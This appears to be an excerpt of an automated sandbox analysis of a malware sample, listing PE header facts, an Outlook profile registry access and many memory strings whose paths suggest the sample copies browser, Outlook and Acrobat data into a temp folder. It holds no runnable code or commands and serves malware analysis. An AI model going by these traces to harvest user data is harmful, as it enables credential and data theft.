Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: jtfCFDmLdX.exe

Static file information: File size 1641984 > 1048576

Source: jtfCFDmLdX.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x188800

Source: jtfCFDmLdX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: jtfCFDmLdX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: jtfCFDmLdX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: jtfCFDmLdX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: jtfCFDmLdX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: jtfCFDmLdX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: jtfCFDmLdX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: jtfCFDmLdX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.* source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tempAVSD2_TFJlRkh1w.pdb\ source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2027240923.00000000083C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2lmp.pdb source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2027240923.00000000083C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2r source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3B6N2X~1.SQL3b6N2Xdh3CYwplaces.sqliteWINLOA~1.PDBO-j source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\tempAVSD2_TFJlRkh1w.pdb.bat! source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdbC source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: jtfCFDmLdX.exe, 00000000.00000000.1648365598.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, TE0FN83.exe, 00000001.00000000.1650796309.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Tg9kb35.exe, 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831.dat source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2^ source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ON source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ri source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdbW+ source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2027653774.000000000842C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbobat\DC source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2V source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*exeent,a source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb.ies source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.batoryIb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbSEARCH~1 source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbm source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbO} source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2lmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831"Xj source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\winload_prod.pdb\** source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2tings.dat source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2J source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbbe7 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.Temp source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\* source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Datanlmp.pdbr source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2027653774.000000000842C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.sesq source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbAcrobat source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdB</sPrinC><sPrinC>GrEbbeV\DoSnloEds< source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\. source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2024876554.0000000008182000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
